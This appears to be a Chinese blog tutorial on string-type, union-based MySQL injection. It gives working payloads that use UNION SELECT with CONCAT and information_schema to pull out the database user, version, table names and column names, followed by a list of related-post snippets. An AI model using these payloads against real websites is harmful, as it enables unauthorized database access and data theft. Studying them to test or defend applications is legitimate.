MYSQL注入语句实用精解

只讲字符型。

order by XX

Union select .....

1' UNION SELECT 1,CONCAT(user(),0x3a,database(),0x3a,version()) #                 这两句是等价的。

1' UNION SELECT 1,CONCAT_WS(CHAR(58),user(),database(),version()) #

上面是字符型的,注释符为 #  , CONCAT_WS 为用分隔符隔开连接的字符。

获取数据库等的信息

1' UNION SELECT 1,concat(table_name) from information_schema.tables where table_schema=database() #

concat产生只是字符串连接,不用也可以,也应该可以把所有表输出。table_name 和 table_schema 是 information_schema中tables表中的一个字段。

1' UNION SELECT 1,concat(column_name) from information_schema.columns where table_name=0x7573657273 #

0x7573657273这个是users的十六进制表示形式。这个users只是一个特例而已。主要根据上面获得表中字段值进行查询。到了这里,数据库知道了,表知道了,表的字段也知道了。剩下的还不会查吗。直接union 查。

库information_schema 中的表tables  有  table_schema(数据库名) 和 table_name(表名) 两个主要字段

库information_schema 中的表columns 有  table_name(表名) 和  column_name(列名) 两主要字段

就算是 order by 出来只有一个可以显示也没关系。可以用concat

如:  concat(字段,0x3a,字段)   把两个字段显示出来了。中间那个是  : 的十六进制表示形式。

mysql注入语句解释,MYSQL注入语句实用精解相关推荐

  1. java网络编程实用精解_Java网络编程实用精解

    Java网络编程实用精解 作者:盛华 出版日期:2009年10月 文件大小:17.38M 支持设备: ¥30.00 适用客户端: 言商书局 iPad/iPhone客户端:下载 Android客户端:下 ...

  2. mysql分页语句解释,mysql语句分页limit什么意思

    mysql语句分页limit什么意思 主要是取数据条数用的 比如取前几条或者中间某几条数据 举两个例子吧 limit 10 (limit 0,10的缩写)这个表示取前十条 limit 2,10 从第三 ...

  3. Oracle 分页语句解释,oracle 分页语句

    private static final String QUERYPERPAGESQL = "select * from (select m.*, rownum rn from (selec ...

  4. oracle分页语句解释,oracle分页语句

    以Student表为例进行分页 纯sql分页 SELECT * FROM ( SELECT ROWNUM,A.* FROM ( SELECT * FROM STUDENT ORDER BY creat ...

  5. concat mysql sql注入_sql注入-mysql注入基础及常用注入语句

    最近在教学中,关于SQL注入,总发现学生理解起来有些难度,其实主要的原因是对各类数据库以及SQL语句不熟悉,今天先介绍mysql注入需要掌握的基础, Mysql内置information_schema ...

  6. php使用mysql预处理语句防止sql注入 简单讲解及代码实现

    目录 前言 sql注入简单介绍 一个例子 使用预处理语句 简介 预处理语句的查询 预处理语句获取查询结果 总结 前言 最近在做一个小项目的后台,牵扯到登录等等需要操作数据库的地方,为了安全起见,特地来 ...

  7. MySQL数据库学习笔记(九)----JDBC的ResultSet接口(查询操作)、PreparedStatement接口重构增删改查(含SQL注入的解释)...

    [声明] 欢迎转载,但请保留文章原始出处→_→ 生命壹号:http://www.cnblogs.com/smyhvae/ 文章来源:http://www.cnblogs.com/smyhvae/p/4 ...

  8. 05_SQL注入_功能语句报错注入盲注

    05_SQL注入_功能语句&报错回显&盲注 1. SQL 语句和网站功能 1.1 Web开发中常见语句 [本章代码来源于pikachu和sqli-lab中的靶场] 开发中,根据不同的需 ...

  9. php mysql 防 sql注入_php 防sql注入方法

    php防sql注入的方法:1.使用mysql_real_escape_string方法转义SQL语句中使用的字符串中的特殊字符:2.打开magic_quotes_gpc来防止SQL注入:3.通过自定义 ...

最新文章

  1. 《程序员代码面试指南》第二章 链表问题 搜索二叉树转换为双向链表
  2. springboot配置多个数据库环境
  3. UVa 439 - Knight Moves
  4. XShell——使用
  5. 经典英语1000句(转)
  6. 客户成功案例 | 台湾杜邦:提升制程能力的法宝 — 先进的数据分析
  7. 等参元:平面四节点四边形等参元的刚度矩阵的计算
  8. 战士的升级速度不可能同法师相比,道士相比也有一定差距
  9. java 线程 设计模式_Java多线程设计模式(四)
  10. 头歌-自己动手画CPU(第一关)-8位可控加减法器-Logisim
  11. 关于iPhone边缘触摸延迟现象
  12. ROS入门教程(六)—— Gazebo仿真
  13. 分享一个英语听力资源下载网站
  14. 毕节职业技术学院计算机网络技术专业,毕节职业技术学院计算机网络技术9.顶岗实习安排...
  15. C补习--------->第六天,二级指针、指针和数组的关系、选择排序
  16. 谁是软件测试的利益相关者?如何识别它们?
  17. slb健康检查方式_负载均衡(SLB)
  18. 分享跨境电商亚马逊大件产品运营方案案例
  19. Coding and Paper Letter(十)
  20. 从管理看:华为如何应对全球化带来的挑战?

热门文章

  1. CSS基础(part7)--字体样式属性
  2. 《终身成长》读书笔记(part6)--真正的自信来源于你的思维模式:你已经做好了成长的准备
  3. 计算机会计的专业知识竞赛,会计知识大赛主持词范文
  4. Python入门知识点总结
  5. SAP 电商云 Spartacus UI 实现的 ngrx-router-store.js 的 serializer
  6. SAP CRM WebClient UI 培训教程
  7. 如何以 mock server 的方式本地启动 SAP UI5 应用,使它不连接服务器端 OData 服务
  8. SAP Spartacus批量读取产品的逻辑
  9. 另一种办法直接在宿主机上的文件夹内查看Docker镜像运行的日志文件
  10. create-react-app应用的入口定义